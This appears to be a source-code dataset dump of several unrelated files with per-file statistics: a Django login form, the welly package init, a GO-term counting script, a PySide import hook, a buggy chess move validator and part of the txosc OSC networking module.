' std::cout << std::endl;',
' for(nt2::uint32_t i = 0; i < M; i++)',
' std::cout << i/2.0 << " -> "',
' << (histo[i]*100.0/k) << "%" << std::endl;',
' }',
'',
]),
}
}
def __init__(self) :
self.tpl = Exhaustive_data.Tpl
if __name__ == "__main__" :
print __doc__
from pprint import PrettyPrinter
PrettyPrinter().pprint(Exhaustive_data.Tpl)
PrettyPrinter().pprint(Exhaustive_data().tpl)
| 46.105263 | 95 | 0.379485 | 581 | 6,132 | 3.836489 | 0.280551 | 0.034545 | 0.05249 | 0.081651 | 0.288022 | 0.143114 | 0.104531 | 0.097353 | 0.097353 | 0.036788 | 0 | 0.036976 | 0.404599 | 6,132 | 132 | 96 | 46.454545 | 0.573542 | 0.061481 | 0 | 0.267241 | 0 | 0.068966 | 0.559221 | 0.172526 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.008621 | null | null | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69ede5a7a5d5e261a9c1ba0ddb8dc8c9e3cbfadd | 1,224 | py | Python | account/forms.py | hhdMrLion/crm_api | 66df068821be36a17c3b0e0e9660b7f8408fa1bd | [
"Apache-2.0"
] | 1 | 2021-06-18T03:03:38.000Z | 2021-06-18T03:03:38.000Z | account/forms.py | hhdMrLion/crm_api | 66df068821be36a17c3b0e0e9660b7f8408fa1bd | [
"Apache-2.0"
] | null | null | null | account/forms.py | hhdMrLion/crm_api | 66df068821be36a17c3b0e0e9660b7f8408fa1bd | [
"Apache-2.0"
] | null | null | null | from django import forms
from django.contrib.auth import authenticate, login
from django.utils.timezone import now
class LoginForm(forms.Form):
""" 登录表单 """
username = forms.CharField(label='用户名', max_length=100, required=False, initial='admin')
password = forms.CharField(label='密码', max_length=200, min_length=6, widget=forms.PasswordInput)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.username = None
def clean(self):
data = super(LoginForm, self).clean()
# 判断用户是哪一位
print(data)
if self.errors:
return
username = data.get('username', None)
password = data.get('password', None)
user = authenticate(username=username, password=password)
if user is None:
raise forms.ValidationError('用户名或者是密码不正确')
else:
if not user.is_active:
raise forms.ValidationError('该用户已被禁用')
self.user = user
return data
def do_login(self, request):
# 执行用户登录
user = self.user
login(request, user)
user.last_login = now()
user.save()
return user
| 30.6 | 101 | 0.591503 | 134 | 1,224 | 5.298507 | 0.462687 | 0.042254 | 0.053521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008187 | 0.301471 | 1,224 | 39 | 102 | 31.384615 | 0.822222 | 0.017974 | 0 | 0 | 0 | 0 | 0.038095 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.1 | 0.1 | 0 | 0.4 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
69ef030a305db0390a90f17929cad93e52de6059 | 2,090 | py | Python | welly/__init__.py | agilescientific/welly | 1ced65d6e7d48642112e72ec8b412687e5a910db | [
"Apache-2.0"
] | 3 | 2022-03-17T08:42:25.000Z | 2022-03-23T08:26:13.000Z | welly/__init__.py | agilescientific/welly | 1ced65d6e7d48642112e72ec8b412687e5a910db | [
"Apache-2.0"
] | 3 | 2022-03-08T13:01:14.000Z | 2022-03-21T09:42:09.000Z | welly/__init__.py | agilescientific/welly | 1ced65d6e7d48642112e72ec8b412687e5a910db | [
"Apache-2.0"
] | 1 | 2022-03-16T03:51:39.000Z | 2022-03-16T03:51:39.000Z | """
==================
welly
==================
"""
from .project import Project
from .well import Well
from .header import Header
from .curve import Curve
from .synthetic import Synthetic
from .location import Location
from .crs import CRS
from . import tools
from . import quality
def read_las(path, **kwargs):
"""
A package namespace method to be called as `welly.read_las`.
Just wraps `Project.from_las()`. Creates a `Project` from a .LAS file.
Args:
path (str): path or URL where LAS is located. `*.las` to load all files
in dir
**kwargs (): See `Project.from_las()`` for addictional arguments
Returns:
welly.Project. The Project object.
"""
return Project.from_las(path, **kwargs)
def read_df(df, **kwargs):
"""
A package namespace method to be called as `welly.read_df`.
Just wraps `Well.from_df()`. Creates a `Well` from your pd.DataFrame.
Args:
df (pd.DataFrame): Column data and column names
Optional **kwargs:
units (dict): Optional. Units of measurement of the curves in `df`.
req (list): Optional. An alias list, giving all required curves.
uwi (str): Unique Well Identifier (UWI)
name (str): Name
Returns:
Well. The `Well` object.
"""
return Well.from_df(df, **kwargs)
__all__ = [
'Project',
'Well',
'Header',
'Curve',
'Synthetic',
'Location',
'CRS',
'quality',
'tools', # Various classes in here
'read_las'
]
from pkg_resources import get_distribution, DistributionNotFound
try:
VERSION = get_distribution(__name__).version
except DistributionNotFound:
try:
from ._version import version as VERSION
except ImportError:
raise ImportError(
"Failed to find (autogenerated) _version.py. "
"This might be because you are installing from GitHub's tarballs, "
"use the PyPI ones."
)
__version__ = VERSION
| 25.180723 | 79 | 0.596651 | 245 | 2,090 | 4.979592 | 0.416327 | 0.045082 | 0.034426 | 0.037705 | 0.081967 | 0.081967 | 0.081967 | 0.081967 | 0.081967 | 0.081967 | 0 | 0 | 0.292345 | 2,090 | 82 | 80 | 25.487805 | 0.824882 | 0.426794 | 0 | 0.052632 | 0 | 0 | 0.173077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.342105 | 0 | 0.447368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
69f45cc29efc997451ff86c0a0f571e78b3958e7 | 125 | py | Python | tridu_py3.py | YuriSerrano/URI-1933 | 58fdc5e90293ef55afacb164b955551a72a81d78 | [
"MIT"
] | null | null | null | tridu_py3.py | YuriSerrano/URI-1933 | 58fdc5e90293ef55afacb164b955551a72a81d78 | [
"MIT"
] | null | null | null | tridu_py3.py | YuriSerrano/URI-1933 | 58fdc5e90293ef55afacb164b955551a72a81d78 | [
"MIT"
] | null | null | null | import sys
'''
Criado por Yuri Serrano
'''
a,b = input().split()
a = int(a)
b = int(b)
if b > a:
print(b)
else:
print(a) | 8.928571 | 23 | 0.568 | 24 | 125 | 2.958333 | 0.583333 | 0.056338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224 | 125 | 14 | 24 | 8.928571 | 0.731959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69f9c87dea73354181eadb4afd02ba8d68d76483 | 1,168 | py | Python | piptui/custom/apNPSApplicationEvents.py | UltraStudioLTD/PipTUI | 62f5707faa004ba6d330288656ba192f37516921 | [
"MIT"
] | 33 | 2019-07-11T13:19:29.000Z | 2022-02-23T12:42:22.000Z | piptui/custom/apNPSApplicationEvents.py | UltraStudioLTD/PipTUI | 62f5707faa004ba6d330288656ba192f37516921 | [
"MIT"
] | 6 | 2019-07-20T21:21:51.000Z | 2021-09-24T16:24:34.000Z | piptui/custom/apNPSApplicationEvents.py | UltraStudioLTD/PipTUI | 62f5707faa004ba6d330288656ba192f37516921 | [
"MIT"
] | 8 | 2019-07-21T07:38:08.000Z | 2021-11-11T13:30:45.000Z | import collections
from npyscreen import StandardApp, apNPSApplicationEvents
class PipTuiEvents(object):
def __init__(self):
self.interal_queue = collections.deque()
super(apNPSApplicationEvents).__init__()
def get(self, maximum=None):
if maximum is None:
maximum = -1
counter = 1
while counter != maximum:
try:
yield self.interal_queue.pop()
except IndexError:
pass
counter += 1
class PipTuiApp(StandardApp):
def __init__(self):
super(StandardApp, self).__init__()
self.event_directory = {}
self.event_queues = {}
self.initalize_application_event_queues()
self.initialize_event_handling()
def process_event_queues(self, max_events_per_queue=None):
for queue in self.event_queues.values():
try:
for event in queue.get(maximum=max_events_per_queue):
try:
self.process_event(event)
except StopIteration:
pass
except RuntimeError:
pass
| 28.487805 | 69 | 0.576199 | 112 | 1,168 | 5.696429 | 0.419643 | 0.068966 | 0.070533 | 0.053292 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003958 | 0.351027 | 1,168 | 40 | 70 | 29.2 | 0.837731 | 0 | 0 | 0.242424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0.090909 | 0.060606 | 0 | 0.242424 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0e0038faf589bc3f8391d7469e67376d79fd62bf | 1,656 | py | Python | scripts/conteo_go.py | Carlosriosch/BrucellaMelitensis | 4f16755fbb3e3ba33010d1e0d9fa68803b377075 | [
"MIT"
] | null | null | null | scripts/conteo_go.py | Carlosriosch/BrucellaMelitensis | 4f16755fbb3e3ba33010d1e0d9fa68803b377075 | [
"MIT"
] | null | null | null | scripts/conteo_go.py | Carlosriosch/BrucellaMelitensis | 4f16755fbb3e3ba33010d1e0d9fa68803b377075 | [
"MIT"
] | null | null | null | from __future__ import division
from collections import Counter
import numpy as np
import glob
path_input = "../GO_analysis_PPI_Brucella/2.GO_crudos_y_ancestors/"
path_output = "../GO_analysis_PPI_Brucella/3.GO_proporciones/"
files = glob.glob(path_input + "*CON_GEN_ID_ancestors*.txt")
for f in files:
# esta etiqueta la voy a usar para darle nombre a los txt de output.
# notar que tire el 0.2 que tenia. De todos modos habria que simplificar la nomenclatura
etiqueta = f.split('.', -1)[-2]
# cargo un file y cuento cuantos hay de cada cosa
data = np.loadtxt(f, dtype = 'str', delimiter = '\n')
# data es una lista que tiene en cada casillero varios GO. Agarro cada casillero y hago un split de todos los terminos. Luego junto todo en una sola lista.
lista = []
sublista = []
for d in data:
sublista.append(d.split())
for s in sublista:
for ss in s:
lista.append(ss)
# ahora cuento las ocurrencias de cada termino. Diccionario que tiene el GO term con la cantidad de ocurrencias
cuentas = Counter(lista)
# para dar la proporcion, calculo la cantidad de elementos
size = len(lista)
proporciones = {}
for c in cuentas:
proporciones[c] = cuentas[c]
#print(c, cuentas[c])
# ordeno
proporciones = sorted(proporciones.items(), key=lambda kv: kv[1])
proporciones = proporciones[::-1]
# ahora lo escribo
results = open(path_output + etiqueta + "_proporciones.txt", "w")
results.write("GO term\t\tocurrencias\n")
for p in proporciones:
results.write("%s\t%d\n" % (p[0], p[1]))
results.close()
| 31.245283 | 159 | 0.667271 | 244 | 1,656 | 4.438525 | 0.491803 | 0.014774 | 0.024007 | 0.038781 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007868 | 0.232488 | 1,656 | 52 | 160 | 31.846154 | 0.844217 | 0.341787 | 0 | 0 | 0 | 0 | 0.166667 | 0.134259 | 0 | 0 | 0 | 0.019231 | 0 | 1 | 0 | false | 0 | 0.137931 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0e0641eb1c77685ac180e16ede2719bf186f1b48 | 616 | py | Python | acq4/util/PySideImporter.py | aleonlein/acq4 | 4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555 | [
"MIT"
] | 1 | 2020-06-04T17:04:53.000Z | 2020-06-04T17:04:53.000Z | acq4/util/PySideImporter.py | aleonlein/acq4 | 4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555 | [
"MIT"
] | 24 | 2016-09-27T17:25:24.000Z | 2017-03-02T21:00:11.000Z | acq4/util/PySideImporter.py | sensapex/acq4 | 9561ba73caff42c609bd02270527858433862ad8 | [
"MIT"
] | 4 | 2016-10-19T06:39:36.000Z | 2019-09-30T21:06:45.000Z | # -*- coding: utf-8 -*-
from __future__ import print_function
"""This module installs an import hook which overrides PyQt4 imports to pull from
PySide instead. Used for transitioning between the two libraries."""
import imp
class PyQtImporter:
def find_module(self, name, path):
if name == 'PyQt4' and path is None:
print("PyQt4 -> PySide")
self.modData = imp.find_module('PySide')
return self
return None
def load_module(self, name):
return imp.load_module(name, *self.modData)
import sys
sys.meta_path.append(PyQtImporter()) | 29.333333 | 82 | 0.655844 | 79 | 616 | 4.987342 | 0.582278 | 0.050761 | 0.071066 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008677 | 0.251623 | 616 | 21 | 83 | 29.333333 | 0.845987 | 0.034091 | 0 | 0 | 0 | 0 | 0.058691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.384615 | 0.076923 | 0.846154 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0e09835187c4782a7d307df7391d9bcf5ed91648 | 14,774 | py | Python | PythonChessEnviroment.py | teleansh/PythonChessEnviorment | cd19a9148a0da8e69c0efcf21dd559ab2084e07a | [
"MIT"
] | null | null | null | PythonChessEnviroment.py | teleansh/PythonChessEnviorment | cd19a9148a0da8e69c0efcf21dd559ab2084e07a | [
"MIT"
] | 1 | 2022-03-08T16:16:26.000Z | 2022-03-08T16:16:26.000Z | PythonChessEnviroment.py | teleansh/PythonChessEnviorment | cd19a9148a0da8e69c0efcf21dd559ab2084e07a | [
"MIT"
] | null | null | null | b = "r n b q k b n r p p p p p p p p".split(" ") + ['.']*32 + "p p p p p p p p r n b q k b n r".upper().split(" ")
def newBoard():
b = "r n b q k b n r p p p p p p p p".split(" ") + ['.']*32 + "p p p p p p p p r n b q k b n r".upper().split(" ")
def display(): #white side view
c , k= 1 ,0
ap = range(1,9)[::-1]
row,col=[],[]
for i in b:
row.append(i)
if c==8 :
c=0
col.append(row)
row=[]
c+=1
for j in col[::-1]:
print(ap[k] , " |" ,end=" ")
for i in j:
print(i,end=' ')
print()
k+=1
print(" ",end="")
print("-"*18," A B C D E F G H",sep="\n")
def move(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
b[fnum], b[tnum] = '.',b[fnum]
display()
def conv(s):
num = int(s[1])
alp = s[0]
a = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8}
alpn = a[alp]
return ((num-1)*8)+alpn
def rookValid(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
con1,con2,con3=False,False,False
if abs(fnum-tnum)%8==0:
con1=True
rows=[range(0,8),range(8,16),range(16,24),range(24,32),range(32,40),range(40,48),range(48,56),range(56,64)]
for k in rows:
if fnum in k and tnum in k:
con2=True
if con2: #verifies if path is clear if fr and to are in same row
for l in range(fnum+1,tnum):
if b[l] != '.':
con2=False
mi =min(fnum,tnum)
ma = max(fnum,tnum)
if con1:
while mi < ma:
mi+=8
if b[mi] !='.':
con1=False
if (b[fnum].isupper() and not b[tnum].isupper()) or (b[fnum].islower() and not b[tnum].islower()) : con3 = True
return (con1 or con2) and con3
def kingValid(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
if not addressValid(fnum,tnum): return False
con1,con2=False,False
if fnum%8!=0 and fnum%9!=0:
val = [fnum+1 , fnum-1,fnum+8,fnum-8]
elif fnum%8==0: val =[fnum+8 , fnum-8,fnum-1]
else: val =[fnum+8 , fnum-8,fnum+1]
if fnum in val : con=True
if (b[fnum].isupper() and not b[tnum].isupper()) or (b[fnum].islower() and not b[tnum].islower()) : con2 = True
return con1 and con2
def pawnValid(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
if not addressValid(fnum,tnum): return False
if fr.isupper() : c='b'
if fr.islower() : c='w'
if c=='w':
if fr in range(8,16): vm = [fnum+8,fnum+16]
else : vm= [fnum+8]
if b[fnum+7].isupper(): vm.append(fnum+7)
if b[fnum+9].isupper(): vm.append(fnum+9)
if tnum in vm and not b[tnum].islower(): return True
else: return False
if c=='b':
if fr in range(48,56): vm = [fnum-8,fnum-16]
else : vm= [fnum-8]
if b[fnum-7].islower(): vm.append(fnum+7)
if b[fnum-9].islower(): vm.append(fnum+9)
if tnum in vm and not b[tnum].isupper(): return True
else: return False
def bishopValid(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
if not addressValid(fnum,tnum): return False
con1=False
if abs(fnum-tnum)%9==0 or abs(fnum-tnum)%7==0:
con1 = True
if (fnum-tnum)%9==0:
while fnum!=tnum:
tnum+=9
if b[tnum]!='.' : return False
if (fnum-tnum)%7==0:
while fnum!=tnum:
tnum+=7
if b[tnum]!='.' : return False
if (tnum-fnum)%9==0:
while tnum!=fnum:
fnum+=9
if b[fnum]!='.' : return False
if (tnum-fnum)%7==0:
while tnum!=fnum:
fnum+=7
if b[fnum]!='.' : return False
if (b[fnum].isupper() and not b[tnum].isupper()) or (b[fnum].islower() and not b[tnum].islower()) : con2 = True
return con1 and con2
def queenValid(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
if not addressValid(fnum,tnum): return False
return bishopValid(fr,to) or rookValid(fr,to)
def knightValid(fr,to):
fnum = (conv(fr))-1
tnum = (conv(to))-1
if not addressValid(fnum,tnum): return False
if tnum in [fnum+17,fnum-17,fnum+15,fnum-15,fnum+10,fnum-6,fnum+6,fnum-10]: con1=True
if (b[fnum].isupper() and not b[tnum].isupper()) or (b[fnum].islower() and not b[tnum].islower()) : con2=True
return con1 and con2
def addressValid(fnum,tnum):
return 0<=fnum<64 and 0<=tnum<64
def rookMoves(pos):
num=(conv(pos))-1 #num is index
if b[num].isupper() : c='b'
elif b[num].islower() : c='w'
else: return "Block is empty"
vm=[]
col=(num+1)%8
if col==0: col=8
row=int(pos[1])
if c=='w':
block=num+8
while row<=8:
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block+=8
row+=1
row=int(pos[1])
block=num-8
while row>0:
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block-=8
row-=1
tcol=col+1 #col is from 1 to 8 , row is from 1 to 8
block =num+1
while tcol<=8:
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block+=1
tcol+=1
block =num-1
tcol=col
while tcol>1:
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block-=1
tcol-=1
tcol=col
row=int(pos[1])
if c=='b':
block=num+8
while row<=8:
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block+=8
row+=1
row=int(pos[1])
block=num-8
while row>1:
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block-=8
row-=1
tcol=col+1 #col is from 1 to 8 , row is from 1 to 8
block =num+1
while tcol<=8:
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block+=1
tcol+=1
block =num-1
tcol=col
while tcol>1:
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block-=1
tcol-=1
move=[]
for l in vm:
move.append(numToAlg(l))
return move
def bishopMoves(pos):
num=(conv(pos))-1
if b[num].isupper() : c='b'
elif b[num].islower() : c='w'
else: return "Block is empty"
vm=[]
col=(num+1)%8
if col==0: col=8
row=int(pos[1])+1
if c=='w':
tcol=col+1
row=int(pos[1])+1
block=num+9
while row<=8 and col<=8 : #goes top right
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block+=9
row+=1
tcol+=1
row=int(pos[1])-1
tcol=col-1
block=num-9
while row>0 and tcol>1: #goes below left
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block-=9
row-=1
tcol-=1
row=int(pos[1])-1
tcol=col+1
block =num-7
while tcol<=8 and row>1: #goes below right
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block-=7
tcol+=1
row-=1
block =num+7
tcol=col-1
row=int(pos[1])+1
while tcol>0 and row<=8: #goes top left
if b[block] == '.' : vm.append(block)
if b[block].isupper() :
vm.append(block)
break
if b[block].islower():
break
block+=7
tcol-=1
row+=1
if c=='b':
tcol=col+1
row=int(pos[1])+1
block=num+9
while row<=8 and col<=8 : #goes top right
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block+=9
row+=1
tcol+=1
row=int(pos[1])-1
tcol=col-1
block=num-9
while row>0 and tcol>1: #goes below left
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block-=9
row-=1
tcol-=1
row=int(pos[1])-1
tcol=col+1
block =num-7
while tcol<=8 and row>1: #goes below right
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].isupper():
break
block-=7
tcol+=1
row-=1
block =num+7
tcol=col-1
row=int(pos[1])+1
while tcol>0 and row<=8: #goes top left
if b[block] == '.' : vm.append(block)
if b[block].islower() :
vm.append(block)
break
if b[block].upper():
break
block+=7
tcol-=1
row+=1
move=[]
for l in vm:
move.append(numToAlg(l))
return move
def queenMoves(pos):
return rookMoves(pos) + bishopMoves(pos)
def knightMoves(pos):
num = conv(pos)-1 #num is index
vm = [num-17,num-15,num-10,num-6,num+6,num+10,num+15,num+17]
if vm[3]%8 in [0,1]:
vm.pop(3)
vm.pop(5)
if vm[4]%8 in [6,7]:
vm.pop(4)
vm.pop(2)
tvm=[]
for i in vm:
if (i>=0 and i<=63) and not ((b[num].isupper and b[i].isupper()) or (b[num].islower and b[i].islower())) : tvm.append(i)
move=[]
for l in tvm:
move.append(numToAlg(l))
return move
def kingMoves(pos):
num = conv(pos)-1 #num is index
vm = [num+8,num-8,num+9,num-9,num+7,num-7,num+1,num-1]
if vm[2]%8==0:
vm.pop(2)
vm.pop(6)
vm.pop(5)
if vm[3]%8 ==7:
vm.pop(3)
vm.pop(-1)
vm.pop(4)
tvm=[]
for i in vm:
if (i>=0 and i<=63) and not ((b[num].isupper and b[i].isupper()) or (b[num].islower and b[i].islower())) : tvm.append(i)
move=[]
for l in tvm:
move.append(numToAlg(l))
return move
def pawnMoves(pos):
num = conv(pos)-1
vm=[]
if b[num].islower() :
if b[num+8] =='.':vm.append(num+8)
if b[num+9].isupper() : vm.append(num+9)
if b[num+7].isupper() : vm.append(num+7)
if b[num+16] =='.' and 7<num<16 : vm.append(num+16)
if b[num].isupper() :
if b[num-8] =='.':vm.append(num-8)
if b[num-9].islower() : vm.append(num-9)
if b[num-7].islower() : vm.append(num-7)
if b[num-16] =='.' and 7<num<16 : vm.append(num-16)
list =[]
for i in vm:
list.append(numToAlg(i))
return list
def moves(pos):
num = conv(pos)-1
if b[num].lower() =='k':
return(kingMoves(pos))
elif b[num].lower() == 'q':
return(queenMoves(pos))
elif b[num].lower() == 'p':
return(pawnMoves(pos))
elif b[num].lower() == 'r':
return(rookMoves(pos))
elif b[num].lower() == 'b':
return(bishopMoves(pos))
elif b[num].lower() == 'n':
return(knightMoves(pos))
def isCheck(pos):
num = conv(pos)-1
r = rookMoves(pos)
b = bishopMoves(pos)
n = knightMoves(pos)
check = False
for rcase in r:
if b[conv(rcase)-1].lower() in ['r','q'] and ( (b[num].islower() and b[conv(rcase)-1].isupper()) or (b[num].isupper() and b[conv(rcase)-1].islower()) ) : check=True
for bcase in r:
if b[conv(bcase)-1].lower() in ['b','q'] and ( (b[num].islower() and b[conv(rcase)-1].isupper()) or (b[num].isupper() and b[conv(rcase)-1].islower()) ): check=True
for kcas in r:
if b[conv(bcase)-1].lower()=='n' and ( (b[num].islower() and b[conv(rcase)-1].isupper()) or (b[num].isupper() and b[conv(rcase)-1].islower()) ): check=True
return check
def numToAlg(ind):
alp=(ind+1)%8
n=((ind+1)//8) + 1
if alp==0:
n-=1
a = {0:'h',1 : 'a' , 2:'b',3:'c',4:'d',5:'e',6:'f',7:'g',8:'h'}
return str(a[alp]) + str(n)
| 26.66787 | 173 | 0.425274 | 2,052 | 14,774 | 3.061891 | 0.066277 | 0.037243 | 0.061117 | 0.012733 | 0.742321 | 0.686774 | 0.672609 | 0.663855 | 0.635206 | 0.635206 | 0 | 0.048368 | 0.41925 | 14,774 | 553 | 174 | 26.716094 | 0.683916 | 0.020306 | 0 | 0.662844 | 0 | 0 | 0.018337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045872 | false | 0 | 0 | 0.004587 | 0.080275 | 0.011468 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0e0d7b53e41d2bf0a7a2e0799a229887f7c07708 | 5,408 | py | Python | txosc/async.py | oubiwann/txosc | 6560a0dc9ef564d785170d4529967599455e4f3e | [
"MIT"
] | 1 | 2018-02-11T07:34:29.000Z | 2018-02-11T07:34:29.000Z | txosc/async.py | oubiwann/txosc | 6560a0dc9ef564d785170d4529967599455e4f3e | [
"MIT"
] | 1 | 2019-01-14T22:42:45.000Z | 2019-01-14T22:42:45.000Z | txosc/async.py | oubiwann/txosc | 6560a0dc9ef564d785170d4529967599455e4f3e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- test-case-name: txosc.test.test_async -*-
# Copyright (c) 2009 Alexandre Quessy, Arjan Scherpenisse
# See LICENSE for details.
"""
Asynchronous OSC sender and receiver using Twisted
"""
import struct
import socket
from twisted.internet import defer, protocol
from twisted.application.internet import MulticastServer
from txosc.osc import *
from txosc.osc import _elementFromBinary
#
# Stream based client/server protocols
#
class StreamBasedProtocol(protocol.Protocol):
"""
OSC over TCP sending and receiving protocol.
"""
def connectionMade(self):
self.factory.connectedProtocol = self
if hasattr(self.factory, 'deferred'):
self.factory.deferred.callback(True)
self._buffer = ""
self._pkgLen = None
def dataReceived(self, data):
"""
Called whenever data is received.
In a stream-based protocol such as TCP, the stream should
begin with an int32 giving the size of the first packet,
followed by the contents of the first packet, followed by the
size of the second packet, etc.
@type data: L{str}
"""
self._buffer += data
if len(self._buffer) < 4:
return
if self._pkgLen is None:
self._pkgLen = struct.unpack(">i", self._buffer[:4])[0]
if len(self._buffer) < self._pkgLen + 4:
print "waiting for %d more bytes" % (self._pkgLen + 4 - len(self._buffer))
return
payload = self._buffer[4:4 + self._pkgLen]
self._buffer = self._buffer[4 + self._pkgLen:]
self._pkgLen = None
if payload:
element = _elementFromBinary(payload)
self.factory.gotElement(element)
if len(self._buffer):
self.dataReceived("")
def send(self, element):
"""
Send an OSC element over the TCP wire.
@param element: L{txosc.osc.Message} or L{txosc.osc.Bundle}
"""
binary = element.toBinary()
self.transport.write(struct.pack(">i", len(binary)) + binary)
#TODO: return a Deferred
class StreamBasedFactory(object):
"""
Factory object for the sending and receiving of elements in a
stream-based protocol (e.g. TCP, serial).
@ivar receiver: A L{Receiver} object which is used to dispatch
incoming messages to.
@ivar connectedProtocol: An instance of L{StreamBasedProtocol}
representing the current connection.
"""
receiver = None
connectedProtocol = None
def __init__(self, receiver=None):
if receiver:
self.receiver = receiver
def send(self, element):
self.connectedProtocol.send(element)
def gotElement(self, element):
if self.receiver:
self.receiver.dispatch(element, self)
else:
raise OscError("Element received, but no Receiver in place: " + str(element))
def __str__(self):
return str(self.connectedProtocol.transport.client)
class ClientFactory(protocol.ClientFactory, StreamBasedFactory):
"""
TCP client factory
"""
protocol = StreamBasedProtocol
def __init__(self, receiver=None):
StreamBasedFactory.__init__(self, receiver)
self.deferred = defer.Deferred()
class ServerFactory(protocol.ServerFactory, StreamBasedFactory):
"""
TCP server factory
"""
protocol = StreamBasedProtocol
#
# Datagram client/server protocols
#
class DatagramServerProtocol(protocol.DatagramProtocol):
"""
The UDP OSC server protocol.
@ivar receiver: The L{Receiver} instance to dispatch received
elements to.
"""
def __init__(self, receiver):
"""
@param receiver: L{Receiver} instance.
"""
self.receiver = receiver
def datagramReceived(self, data, (host, port)):
element = _elementFromBinary(data)
self.receiver.dispatch(element, (host, port))
